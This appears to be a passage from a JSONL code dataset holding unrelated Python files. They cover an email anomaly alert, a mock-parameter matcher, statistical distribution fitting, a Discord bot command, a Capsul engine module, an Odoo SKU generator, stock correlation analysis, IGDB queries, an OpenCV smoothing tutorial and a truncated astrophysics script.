系統再過 {pred_time_value} 分鐘可能會有異常之現象發生,\r\n    且可能發生的異常原因為 {pred_reason_value} ,所以在此提醒您,而系統會如此預測的原因如下:\r\n\r\n1.\r\n{pred_time_reason}\r\n\r\n2.\r\n{pred_reason}\r\n\r\n---------------------------------------------\r\n本郵件由系統自動發出,請勿回覆本郵件。\r\n'''.format(time = time, pred_time_value = pred_time_value, pred_time_reason = pred_time_reason, pred_reason_value = pred_reason_value, pred_reason = pred_reason)\r\n        msg = MIMEText(text, 'plain', 'utf-8')\r\n        msg['From'] = format_addr('藍科智慧管理員 <%s>' % from_addr)\r\n        msg['To'] = ','.join(map(format_addr, to_addr))\r\n        msg['Subject'] = Header('【異常預測通知】COH 系統異常預測提醒', 'utf-8')\r\n        \r\n        smtp_server = '10.68.68.109'\r\n        smtp_port = 25\r\n        server = smtplib.SMTP(smtp_server, smtp_port)\r\n        error_list = server.sendmail(from_addr, to_addr, msg.as_string())\r\n        server.quit()\r\n        if error_list == {}: print('郵件發送成功 !')","sub_path":"FET/stream/Each_5_check_mail.py","file_name":"Each_5_check_mail.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"176566008","text":"from pythonmock.any_parameter import AnyParameter\n\n\nclass MockFunctionParameters(object):\n    args: tuple\n    kwargs: dict\n\n    def __init__(self, args: tuple, kwargs: dict):\n        self.args = args\n        self.kwargs = kwargs\n\n    def is_match(self, args, kwargs) -> bool:\n        return self.__check_args(args) and self.__check_kwargs(kwargs)\n\n    def __check_args(self, args: tuple) -> bool:\n        if not isinstance(args, type(self.args)):\n            return False\n\n        if args is not None:\n            if len(args) != len(self.args):\n                return False\n\n            for index, arg in enumerate(args):\n                if isinstance(self.args[index], AnyParameter):\n                    continue\n\n                if arg != self.args[index]:\n                    return False\n\n        return True\n\n    def __check_kwargs(self, kwargs: dict) -> bool:\n        if not isinstance(kwargs, type(self.kwargs)):\n            return False\n\n        if kwargs is not None:\n            kwargs_keys = set(kwargs.keys())\n            original_keys = set(self.kwargs.keys())\n\n            if kwargs_keys != original_keys:\n                return False\n\n            # iterate over items(); iterating the dict directly yields only keys\n            for parameter_name, parameter_value in kwargs.items():\n                if isinstance(self.kwargs.get(parameter_name), AnyParameter):\n                    continue\n\n                if parameter_value != self.kwargs.get(parameter_name):\n                    return False\n\n        return True\n\n    def number_of_any_parameters(self) -> int:\n        qnt = sum(1 if isinstance(a, AnyParameter) else 0 for a in self.args)\n        qnt += sum(1 if isinstance(a, AnyParameter) else 0 for a in self.kwargs.values())\n\n        return qnt\n","sub_path":"pythonmock/mock_function_parameters.py","file_name":"mock_function_parameters.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471333879","text":"import logging\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nfrom patsy import dmatrices\nfrom scipy.stats import entropy, poisson\nfrom sklearn.metrics import mean_absolute_error\nfrom statsmodels.formula.api import glm\n\n\ndef fit_distribution(count_col, data, distributions):\n    logger = logging.getLogger(__name__)\n\n    predicted_df = pd.DataFrame()\n    fitted_scores = pd.DataFrame()\n    for dist in distributions:\n        actual_counts = data[count_col]\n        # get predicted counts\n        pred_counts, fit_score = get_predicted_counts(actual_counts, dist)\n        # test predicted columns\n        fit_score['distribution'] = dist\n        fitted_scores = fitted_scores.append(fit_score, ignore_index=True)\n        # save 
predicted counts under tsfmed sample method\n predicted_df[dist + \" \" + count_col] = pred_counts\n\n logger.info(f'\\nDistributions sorted by goodness of fit:\\n{\"-\" * 40}')\n logger.info(fitted_scores)\n logger.info('\\n')\n\n return predicted_df\n\n\ndef get_predicted_counts(data, dist):\n \"\"\"Fit distribution\"\"\"\n col_name = data.name.replace(' ', '_').replace('/', '_')\n data = data.rename(col_name)\n\n expr = '{cc} ~ {cc}'.format(cc=col_name)\n\n def get_alpha_value(count, data):\n poisson_model = glm(expr, data=data, family=sm.families.Poisson()).fit()\n data['BB_LAMBDA'] = poisson_model.mu # lambda value\n\n data['AUX_OLS_DEP'] = data.apply(lambda x: ((x[count] - x['BB_LAMBDA']) ** 2 - x[\n count]) / x['BB_LAMBDA'], axis=1)\n ols_expr = \"\"\"AUX_OLS_DEP ~ BB_LAMBDA - 1\"\"\"\n aux_olsr_results = smf.ols(ols_expr, data).fit()\n\n return aux_olsr_results.params[0]\n\n # Get data\n data_ = data.to_frame()\n y, actual_counts = dmatrices(expr, data=data_, return_type='dataframe')\n\n # Instantiate model\n if 'zinflate poisson' in dist:\n model = sm.ZeroInflatedPoisson(y, actual_counts, inflation='logit')\n # model = reg_model.ZeroInflatedPoisson(y, x, x, inflation='logit')\n else:\n if 'nbinom' in dist:\n alpha = get_alpha_value(col_name, data_)\n distribution = sm.families.NegativeBinomial(alpha=alpha)\n elif 'poisson' in dist:\n distribution = sm.families.Poisson()\n\n model = glm(expr, data=data_, family=distribution)\n\n # Fit the model\n try:\n if 'qpoisson' in dist:\n model = model.fit(cov_type='HC1')\n else:\n model = model.fit(maxiter=50)\n except:\n model = model.fit(method='nm')\n\n # Predict the data\n try:\n predicted = model.get_prediction(actual_counts)\n predicted_counts = predicted.summary_frame()['mean']\n except:\n try:\n predicted_counts = model.predict(actual_counts)\n except:\n zip_mean_pred = model.predict(actual_counts,\n exog_infl=np.ones((len(actual_counts), 1)))\n predicted_counts = poisson.ppf(q=0.95, mu=zip_mean_pred)\n\n # test fit scores\n fit_scores = test_goodness_fit(data, predicted_counts, model)\n\n return predicted_counts, fit_scores\n\n\ndef test_goodness_fit(actual_counts, predicted_counts, model):\n try:\n kl_div = kl_divergence(actual_counts, predicted_counts)\n mae = mean_absolute_error(actual_counts, predicted_counts)\n pchi = model.pearson_chi2\n dev = model.deviance\n st_sig = 268.531 < pchi\n\n return {'kl div': kl_div, \"mae\": mae, 'pearson chi2': pchi, 'deviance': dev,\n 'statistically significant': st_sig}\n except:\n return {'kl div': kl_div, \"mae\": mae}\n\n\ndef print_stats(data):\n def get_confidence_limit(stats):\n alpha = 0.95\n p = ((1.0 - alpha) / 2.0) * 100\n lower = max(0.0, np.percentile(stats, p))\n p = (alpha + ((1.0 - alpha) / 2.0)) * 100\n upper = min(100.0, np.percentile(stats, p))\n return alpha * 100, lower, upper\n\n print(f'COUNT: {len(data)}')\n print(f'AVG: {np.mean(data)}')\n print(f'MEDIAN: {np.median(data)}')\n print(f'STD DEV: {np.std(data)}')\n print(f'VAR: {np.var(data)}')\n print('%.1f confidence interval %.2f%% and %.2f%%\\n' % (get_confidence_limit(data)))\n\n\ndef plot_distribution(data, verbose=True):\n fig, (ax_box, ax_hist) = plt.subplots(2, sharex=True,\n gridspec_kw={\"height_ratios\": (0.2, 1)})\n\n mean = np.mean(data)\n median = np.median(data)\n\n # boxplot\n sns.boxplot(data, ax=ax_box)\n ax_box.axvline(mean, color='r', linestyle='--')\n ax_box.axvline(median, color='g', linestyle='-')\n\n sns.distplot(data, kde=False, ax=ax_hist)\n ax_hist.axvline(mean, color='r', linestyle='--')\n 
ax_hist.axvline(median, color='g', linestyle='-')\n\n plt.legend({'Mean': mean, 'Median': median})\n if verbose:\n print_stats(data)\n plt.show()\n\n\ndef kl_divergence(p, q):\n eps = 0.01\n pp = p + eps\n pp /= sum(pp)\n\n qq = q + eps\n qq /= sum(qq)\n kl_div = entropy(pp, qq, base=10.)\n return kl_div\n","sub_path":"validate_exp/transform_data.py","file_name":"transform_data.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221112666","text":"\"\"\"\r\nMIT License\r\n\r\nCopyright (c) 2020 MyerFire\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n\"\"\"\r\n\r\nimport datetime\r\nimport discord\r\nimport humanfriendly\r\nfrom discord.ext import commands\r\n\r\nimport core.static.static\r\n\r\n\r\nclass Guild(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n @commands.command(name=\"guild\", aliases=[\"g\", \"server\"])\r\n @commands.max_concurrency(1, per=commands.BucketType.user)\r\n async def guild(self, ctx: commands.Context):\r\n guild_embed = discord.Embed(\r\n color=ctx.guild.owner.color,\r\n timestamp=ctx.message.created_at\r\n ).set_author(\r\n name=f\"{ctx.guild.name} ({ctx.guild.id})\",\r\n icon_url=str(ctx.guild.icon_url_as(static_format=\"png\", size=2048))\r\n ).add_field(\r\n name=f\"__**{core.static.static.arrow_bullet_point} Owner**__\",\r\n value=f\"{ctx.guild.owner.mention} ({ctx.guild.owner.id})\"\r\n ).add_field(\r\n name=f\"__**{core.static.static.arrow_bullet_point} Creation Date**__\",\r\n value=f\"{ctx.guild.created_at.strftime(ctx.bot.CREATION_TIME_FORMAT)} ({humanfriendly.format_timespan(datetime.datetime.now() - ctx.guild.created_at)} ago)\",\r\n inline=False\r\n ).add_field(\r\n name=f\"__**{core.static.static.arrow_bullet_point} Channels ({len(await get_pure_channels(ctx.guild.channels))})**__\",\r\n value=f\"({len(ctx.guild.text_channels)} text and {len(ctx.guild.voice_channels)} voice)\",\r\n inline=False\r\n ).add_field(\r\n name=f\"__**{core.static.static.arrow_bullet_point} Members**__\",\r\n value=f\"{ctx.guild.member_count:,d}\",\r\n ).add_field(\r\n name=f\"__**{core.static.static.arrow_bullet_point} Emoji**__\",\r\n value=f\"{len(ctx.guild.emojis):,d}\"\r\n ).add_field(\r\n name=f\"__**{core.static.static.arrow_bullet_point} Roles ({(len(ctx.guild.roles) - 1):,d})**__\", # @everyone\r\n # role doesn't count\r\n value=f\"{await core.static.static.get_role_mentions_string(await 
core.static.static.get_role_mentions(ctx.guild.roles))}\",\r\n inline=False\r\n )\r\n await ctx.send(embed=guild_embed)\r\n\r\n\r\nasync def get_pure_channels(channels) -> list:\r\n for channel in channels:\r\n if isinstance(channel, discord.CategoryChannel):\r\n channels.remove(channel)\r\n return channels\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Guild(bot))\r\n print(\"Reloaded commands.guild\")","sub_path":"commands/guild.py","file_name":"guild.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"410722626","text":"'''\nThis module defines the main API to interact with Capsul processes.\nIn order to execute a process, it is mandatory to have an instance of\n:py:class:`Platform`. Such an instance can be created with constructor\nor by using a JSON representation of the instance (created by \n:py:meth:`Platform.to_json`) with\n:py:func:`soma.serialization.from_json`\n'''\nimport sys\nimport json\nimport os.path as osp\nimport re\n\nfrom traits.api import Undefined\n\nfrom soma.controller import Controller\nfrom soma.serialization import to_json, from_json\n\nfrom .database_json import JSONDBEngine\nfrom .execution_context import ExecutionContext\n\nfrom capsul.study_config.study_config import StudyConfig\n\nclass CapsulEngine(Controller):\n default_modules = ['capsul.engine.module.spm',\n 'capsul.engine.module.fsl']\n \n def __init__(self, \n database_location,\n database,\n config=None):\n '''\n CapsulEngine constructor should not be called directly.\n Use engine() factory function instead.\n '''\n super(CapsulEngine, self).__init__()\n \n self._database_location = database_location\n self._database = database\n\n self.study_config = StudyConfig()\n \n db_config = database.json_value('config')\n self.modules = database.json_value('modules')\n if self.modules is None:\n self.modules = self.default_modules\n self.load_modules()\n \n execution_context = from_json(database.json_value('execution_context'))\n if execution_context is None:\n execution_context = ExecutionContext()\n self._execution_context = execution_context\n \n self._processing_engine = from_json(database.json_value('processing_engine')) \n self._metadata_engine = from_json(database.json_value('metadata_engine'))\n \n for cfg in (db_config, config):\n if cfg:\n for n, v in cfg.items():\n if isinstance(v, dict):\n o = getattr(self, n)\n if isinstance(o, Controller):\n o.import_from_dict(v)\n continue\n setattr(self, n, v)\n\n self.init_modules()\n\n @property\n def database(self):\n return self._database\n\n @property\n def database_location(self):\n return self._database_location\n \n @property\n def execution_context(self):\n return self._execution_context\n\n @execution_context.setter\n def execution_context(self, execution_context):\n self._execution_context = execution_context\n \n @property\n def processing_engine(self):\n return self._processing_engine\n \n \n @property\n def metadata_engine(self):\n return self._metadata_engine\n \n @metadata_engine.setter\n def metadata_engine(self, metadata_engine):\n self._metadata_engine = metadata_engine\n self.database.set_json_value('metadata_engine', \n to_json(self._metadata_engine))\n \n def load_modules(self):\n if self.modules is None:\n modules = self.default_modules\n else:\n modules = self.modules\n \n self._loaded_modules = {}\n for module in modules:\n self.load_module(module)\n \n def load_module(self, module):\n if module not in self._loaded_modules:\n 
__import__(module)\n            python_module = sys.modules.get(module)\n            if python_module is None:\n                raise ValueError('Cannot find %s in Python modules' % module)\n            loader = getattr(python_module, 'load_module', None)\n            if loader is None:\n                raise ValueError('No function load_module() defined in %s' % module)\n            self._loaded_modules[module] = loader(self, module)\n            return True\n        return False\n    \n    def init_modules(self):\n        if self.modules is None:\n            modules = self.default_modules\n        else:\n            modules = self.modules\n        for module in modules:\n            self.init_module(module)\n    \n    def init_module(self, module):\n        python_module = sys.modules.get(module)\n        if python_module is None:\n            raise ValueError('Cannot find %s in Python modules' % module)\n        initializer = getattr(python_module, 'init_module', None)\n        if initializer is None:\n            raise ValueError('No function init_module() defined in %s' % module)\n        initializer(self, module, self._loaded_modules[module])\n    \n    def save(self):\n        self.database.set_json_value('execution_context', \n                                     to_json(self._execution_context))\n        if self._processing_engine:\n            self.database.set_json_value('processing_engine', \n                                        to_json(self._processing_engine))\n        if self._metadata_engine:\n            self.database.set_json_value('metadata_engine', \n                                        to_json(self._metadata_engine))\n        config = {}\n        for n in self.user_traits().keys():\n            v = getattr(self, n)\n            if v is Undefined:\n                continue\n            if isinstance(v, Controller):\n                v = v.export_to_dict(exclude_undefined=True)\n                if not v:\n                    continue\n            config[n] = v\n        self.database.set_json_value('config', config)\n        self.database.commit()\n    \n    \n    #\n    # Methods delegated to self.database\n    #\n    def set_named_directory(self, name, path):\n        return self.database.set_named_directory(name, path)\n    \n    def named_directory(self, name):\n        return self.database.named_directory(name)\n    \n    def named_directories(self):\n        return self.database.named_directories()\n    \n    \n    def set_json_value(self, name, json_value):\n        return self.database.set_json_value(name, json_value)\n\n    def json_value(self, name):\n        return self.database.json_value(name)\n    \n    \n    def set_path_metadata(self, path, metadata, named_directory=None):\n        return self.database.set_path_metadata(path, metadata, named_directory)\n    \n    def path_metadata(self, path, named_directory=None):\n        return self.database.path_metadata(path, named_directory)\n\n\n\n    def get_process_instance(self, process_or_id, **kwargs):\n        '''\n        The supported way to get a process instance is to use this method.\n        For now, it simply calls self.study_config.get_process_instance\n        but it will change in the future.\n        '''\n        instance = self.study_config.get_process_instance(process_or_id,\n                                                          **kwargs)\n        return instance\n\n\n_populsedb_url_re = re.compile(r'^\\w+(\\+\\w+)?://(.*)')\ndef database_factory(database_location):\n    global _populsedb_url_re \n    \n    engine = None\n    engine_directory = None\n\n    if database_location.endswith('.json'):\n        engine_directory = osp.abspath(osp.dirname(database_location))\n        engine = JSONDBEngine(database_location)\n    else:\n        match = _populsedb_url_re.match(database_location)\n        if match:\n            path = match.group(2)\n            _, path = osp.splitdrive(path)\n            if path.startswith(osp.sep):\n                engine_directory = osp.abspath(osp.dirname(path))\n            populse_db = database_location\n        elif database_location.endswith('.sqlite'):\n            populse_db = 'sqlite:///%s' % database_location\n            engine_directory = osp.abspath(osp.dirname(database_location))\n        elif database_location == ':memory:':\n            populse_db = 'sqlite:///:memory:'\n        else:\n            raise ValueError('Invalid database location: %s' % database_location)\n        \n        # Import the populse_db related module only if it is used,\n        # to avoid adding a mandatory dependency on the project\n        from .database_populse import PopulseDBEngine\n        engine = PopulseDBEngine(populse_db)\n    if engine_directory:\n        engine.set_named_directory('capsul_engine', engine_directory)\n    return engine\n\ndef capsul_engine(database_location=None, config=None):\n    '''\n    User factory for creating capsul engines\n    '''\n    if database_location is None:\n        database_location = osp.expanduser('~/.config/capsul/capsul_engine.json')\n    database = database_factory(database_location)\n    capsul_engine = CapsulEngine(database_location, database, config=config)\n    return capsul_engine\n    \n","sub_path":"capsul/engine/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"197423266","text":"# -*- encoding: utf-8 -*-\n\nfrom openerp import models, fields, api, _\nfrom odoo.exceptions import UserError\nimport datetime, string\n\nclass IrSequence(models.Model):\n    _inherit = \"ir.sequence\"\n\n    next_sku = fields.Char(string=u'next SKU')\n\n    @api.model\n    def get_seller_sku(self):\n        '''Generate a 10-character seller SKU: 6 date digits + 4 uppercase letters; at most 26**4 = 456,976 can be generated per day'''\n        record = self.search([('code', '=', 'sku_seq')], limit=1)\n        sku = record.next_sku\n        current_sku = sku[6:]\n        if current_sku == 'ZZZZ':\n            raise UserError(u'今日的seller sku数量达到上限!')\n        now_time = datetime.datetime.now() + datetime.timedelta(hours=8)\n        date_str = now_time.strftime('%y%m%d')\n        if date_str == sku[:6]:\n            # increment the 4-letter suffix as a base-26 number (A-Z), carrying on 'Z'\n            uppercases = [word for word in string.uppercase]\n            current_sku_list = [word for word in current_sku]\n            reverse_seq = current_sku_list[::-1]\n            for i in range(len(reverse_seq)):\n                index = uppercases.index(reverse_seq[i])\n                if index == 25:\n                    reverse_seq[i] = 'A'\n                else:\n                    reverse_seq[i] = uppercases[index + 1]\n                    break\n            next_seq = ''\n            for word in reverse_seq:\n                next_seq = word + next_seq\n            record.next_sku = date_str + next_seq\n        else:\n            record.next_sku = date_str + 'AAAB'\n            return date_str + 'AAAA'\n        return sku\n\n\n","sub_path":"HZMX/amazon_api/models/ir_sequence.py","file_name":"ir_sequence.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560090377","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov  5 15:43:00 2018\n\n@author: admin\n\"\"\"\n\n\nimport os\nimport pandas as pd\nimport numpy as np\ndfs=dict()\ndts=[x[0:8] for x in os.listdir(\"./div\")]\nsyms=list()\nfor dt in dts:\n    dfs[dt]=pd.read_csv(f\"./div/{dt}.csv\",index_col=0)\n    syms=list(set(syms+list(dfs[dt].index)))\n\nind=dict()\ndfi=dict()\nfor i in [\"Adj\"+j for j in ['Open','Close','PreClose']]:\n    ind[i]=dict()\n    for dt in dts:\n        ind[i][dt]=dfs[dt][i].T\n    dfi[i]=pd.DataFrame(ind[i])\n    dfi[i].fillna(method='ffill',inplace=True)\n    
dfi[i].fillna(method='bfill',inplace=True)\nclose_close=dfi['AdjClose']-dfi['AdjPreClose']\nclose_close[np.isinf(close_close)]=0\ninter=close_close.mean().mean()\n\nopen_close=(dfi['AdjClose']-dfi['AdjOpen'])/(dfi['AdjClose']-dfi['AdjPreClose'])\nopen_close[np.isinf(open_close)]=0\ninter=open_close.mean().mean()\n\npclose_open=(dfi['AdjOpen']-dfi['AdjPreClose'])/(dfi['AdjClose']-dfi['AdjPreClose'])\npclose_open[np.isinf(pclose_open)]=0\novernight=pclose_open.mean().mean()\n\no_c_corr=open_close.T.corr()\npc_o_corr=pclose_open.T.corr()\nc_c_corr=close_close.T.corr()\nsh6_cc=c_c_corr['SH600000']\nsh6_oc=o_c_corr['SH600000']\nsh6_pco=pc_o_corr['SH600000']\n\n\n'''\nThe difference in correlation between intraday moves and day-over-day moves is astonishing\n'''\n\n'''\nOne DataFrame per day, stored in one big dict\nindexed by trading day\nfor each indicator, build the corresponding series and merge it into that indicator's DataFrame\nthen see how it performs\n'''\n\n'''\ndate\nstock name\nindustry name\nrank within industry\nbeta value\n'''","sub_path":"ind/corr_daily.py","file_name":"corr_daily.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"252724702","text":"# created by RomaOkorosso at 21.03.2021\n# book_methods.py\n\nfrom datetime import datetime, timedelta, date\nfrom typing import Optional\nfrom Models.models import Book, TakenBook\nfrom Models import schemas\nfrom sqlalchemy.orm import Session\nfrom Database.exceptions import *\nfrom pydantic import ValidationError\n\n\nclass BookMethods:\n\n    @staticmethod\n    def add_book(db: Session, add_book: schemas.AddBook):\n        new_book = Book(**add_book.dict())\n        db.add(new_book)\n        db.commit()\n        return new_book\n\n    @staticmethod\n    def get_book(db: Session, book_id: int):\n        try:\n            book = db.query(Book).filter(Book.id == book_id).first()\n        except Exception as err:\n            print(err)\n        else:\n            if book is None:\n                raise ItemNotFound(f\"No such book id: {book_id} in database\")\n            return book\n\n    @staticmethod\n    def update_book(db: Session, update_book: schemas.Book):\n        try:\n            book = BookMethods.get_book(db, update_book.id)\n        except ItemNotFound as err:\n            print(err)\n        else:\n            # items(), not the Python 2 iteritems()\n            for key, value in update_book.__dict__.items():\n                setattr(book, key, value)\n            db.commit()\n\n    @staticmethod\n    def add_book_to_taken(db: Session, taken_book: schemas.TakenBook):\n        to_add_taken_book = TakenBook(**taken_book.dict())\n        db.add(to_add_taken_book)\n        db.commit()\n\n    @staticmethod\n    def get_taken_book_by_id(db: Session, taken_book_id: int):\n        try:\n            taken_book = db.query(TakenBook).filter(TakenBook.id == taken_book_id).first()\n        except Exception as err:\n            print(err)\n        else:\n            if taken_book is None:\n                raise ItemNotFound(f\"No such taken_book id: {taken_book_id} in database\")\n            return taken_book\n\n    @staticmethod\n    def get_taken_book_by_client_and_book(db: Session, book_id: int, client_id: int):\n        try:\n            # pass both conditions to filter(); combining them with the Python\n            # 'and' operator would not build the intended SQL predicate\n            taken_book = db.query(TakenBook).filter(\n                TakenBook.book_id == book_id, TakenBook.client_id == client_id).first()\n        except Exception as err:\n            print(err)\n        else:\n            if taken_book is None:\n                raise ItemNotFound(\"No such taken_book in database\")\n            return taken_book\n\n    @staticmethod\n    def update_taken_book(db: Session, taken_book_update: schemas.TakenBook):\n        try:\n            taken_book: TakenBook = BookMethods.get_taken_book_by_id(db, taken_book_update.id)\n        except ItemNotFound as err:\n            print(err)\n        else:\n\n            for key, value in dict(taken_book_update).items():\n                setattr(taken_book, key, value)\n            db.commit()\n\n    @staticmethod\n    def return_book(db: Session, taken_book_id: int):\n        taken_book: TakenBook = BookMethods.get_taken_book_by_id(db, taken_book_id)\n        taken_book.return_date = 
datetime.now().date()","sub_path":"Database/book_methods.py","file_name":"book_methods.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479588967","text":"from igdb.wrapper import IGDBWrapper\nimport config\n\nwrapper = IGDBWrapper(config.CLIENT_ID, config.ACCESS_TOKEN)\n\nbyte_array = wrapper.api_request(\n 'games',\n 'fields cover, name, artworks ; search \"Cyberpunk 2077\";'\n)\n\ncover_data = wrapper.api_request(\n 'covers',\n 'fields game, image_id; where id = 70754;'\n)\n\nartwork_data = wrapper.api_request(\n 'artworks',\n 'fields url; where id = (4940, 4941, 4942,4943,5034,5035,5036,5037,4940,5673,5674,8066,8743);'\n)\n\nprint(byte_array)\nprint(cover_data)\nprint(artwork_data)","sub_path":"download_cover_art.py","file_name":"download_cover_art.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165447988","text":"#阈值与平滑处理\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n#图像阈值\n'''\nret,dst = cv2.threshold(src,thresh,maxval,type)\nsrc:输入图,只能输入单通道图像,通常来说为灰度图\ndst:输出图\nthresh:阈值\nmaxval:当像素值超过了阈值(或者小于阈值,根据type决定),所赋予的值\ntype:二值化操作的类型,包含以下5种类型:\ncv2.THRESH_BINARY 超过阈值部分去maxval(最大值),否则取0\ncv2.THRESH_BINARY_INV THRESH_BINARY的反转\ncv2.THRESH_TRUNC 大于阈值的部分设为阈值,否则不变\ncv2.THRESH_TOZERO 大于阈值部分不改变,否则设为0\ncv2.THRESH_TOZERO_INV THRESH_TOZERO的反转\n'''\nimg = cv2.imread('cat.jpg')\nimg_gray = cv2.imread('cat.jpg',cv2.IMREAD_GRAYSCALE)\nret,thresh1 = cv2.threshold(img_gray,127,255,cv2.THRESH_BINARY )\nret,thresh2 = cv2.threshold(img_gray,127,255,cv2.THRESH_BINARY_INV )\nret,thresh3 = cv2.threshold(img_gray,127,255,cv2.THRESH_TRUNC )\nret,thresh4 = cv2.threshold(img_gray,127,255,cv2.THRESH_TOZERO )\nret,thresh5 = cv2.threshold(img_gray,127,255,cv2.THRESH_TOZERO_INV )\n\ntitle = ['Original Image','BINARY','BINARY_INV','TRUNC','TOZERO','TOZERO_INV']\nimages = [img,thresh1,thresh2,thresh3,thresh4,thresh5]\n\nfor i in range(6):\n plt.subplot(2,3,i+1),plt.imshow(images[i],'gray')\n plt.title(title[i])\n plt.xticks([]),plt.yticks([])\n ''' \n xsticks与yticks:指定坐标轴的刻度\n xticks(ticks, [labels], **kwargs) icks : \n array_like\n 应该放置刻度的位置列表。您可以传递一个空列表来禁用xticks。\n labels : array_like,可选\n 要放置在给定位置的显式标签列表。\n ** kwargs\n Text 属性可用于控制标签的外观。\n linspace(start, stop, num, endpoint, retstep, dtype)\n start:开始值\n stop:终值\n num:元素个数,默认值50。可选参数\n endpoint : 如果是为 True,包括终值stop。默认值为 True。可选参数\n retstep : 如果为True,返回 (`samples`, `step`),step表示 samples之间的间距。可选参数\n dtype : 输出数组的数据类型.。如果 `dtype` 没有给定,参照其他输入的数据类型。可选参数\n '''\nplt.show()\n\n\n#平滑处理\nimg1 = cv2.imread('lenaNoise.png')\ncv2.imshow('img1',img1)\n\n#均值滤波\n'''\n均值滤波:设定一个矩阵,对以点为中心所在的3X3矩阵做内积,然后再除以数的个数(9个),得到均值赋予为该点的像素值\n'''\n#简单的平均卷积操作\nblur = cv2.blur(img1,(3,3))#(3,3)表示卷积盒\ncv2.imshow('blur',blur)\n\n#方框滤波\n#基本和均值一样,可以选择归一化\nbox = cv2.boxFilter(img1,-1,(3,3),normalize=True)#-1指得到的结果在颜色通道上是一致的,就是求完平均后每个矩阵点上都是那个平均值\n#normalize:当为True时,与均值一样(在求完和后除以9),为False时,只求和然后赋值,此情况容易越界如果大于255就全部赋予255,故图像会大部分为白色\ncv2.imshow('box',box)\n\n#高斯滤波\n'''\n高斯函数:越接近指定值(x)时,输出值(y)越大,运用于图像处理时可以这样理解:在矩阵求和得均值时加以权重,指定值即中间值得权重设为1(最大),与中间值相差越大给与权重越小\n'''\n#高斯模糊的卷积核里的数值是满足高斯分布的,相当于更重视中间的\naussian = cv2.GaussianBlur(img1,(5,5),1)#1是设定矩阵(高斯核)x方向的标准差为1即标准正态分布\ncv2.imshow('aussian',aussian)\n\n#中值滤波 处理效果比较明显的方法\n#将矩阵内的所有像素值从小到大排列取中值,用中值代替\nmedian = cv2.medianBlur(img1,5)#5就相当于(5,5),在medianBlur函数内只写方阵故只写一个\ncv2.imshow('median',median)\n\n#显示所有的\nres = 
np.hstack((blur,aussian,median))# hstack lines the tuple's arrays up horizontally; vstack stacks them vertically\nprint(res)\ncv2.imshow('median vs average',res)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"opencv/Class/class2/class2.py","file_name":"class2.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"131264127","text":"''' CHANGES\n- many_to_one: verbose=True, assert_x0_unique=False, assert_x1_in_x0=False\n- save_cc_prev\n- h5distread\n- resumeStep\n- verbose/timekeeping\n- useGPU, intersect1d and many-to-one\n'''\nfrom __future__ import division\nimport numpy as np\nimport subhalo_mass_loss_model_LastJourney as SHMLM\nfrom itk import h5_write_dict, h5_read_dict, many_to_one, many_to_one_GPU, intersect1d_GPU\nfrom tqdm import tqdm # progress bar\nimport os\nimport glob\nimport time\n\ncc_data_dir = SHMLM.cc_data_dir\ncc_output_dir = SHMLM.cc_output_dir\n\nA, zeta = SHMLM.AFID, SHMLM.ZETAFID\n\nsteps = SHMLM.steps\n\nvars_cc_all = [\n 'fof_halo_tag',\n 'core_tag',\n 'tree_node_index',\n 'infall_tree_node_mass',\n 'central',\n 'host_core'\n]\nvars_cc_min = [\n 'core_tag',\n 'tree_node_index',\n 'infall_tree_node_mass',\n 'central',\n 'host_core'\n]\n\ndef vars_cc(step):\n if step==499 or step==247:\n return vars_cc_all\n else:\n return vars_cc_min\n\ndef fname_cc(step, mode):\n if mode == 'input':\n return cc_data_dir + 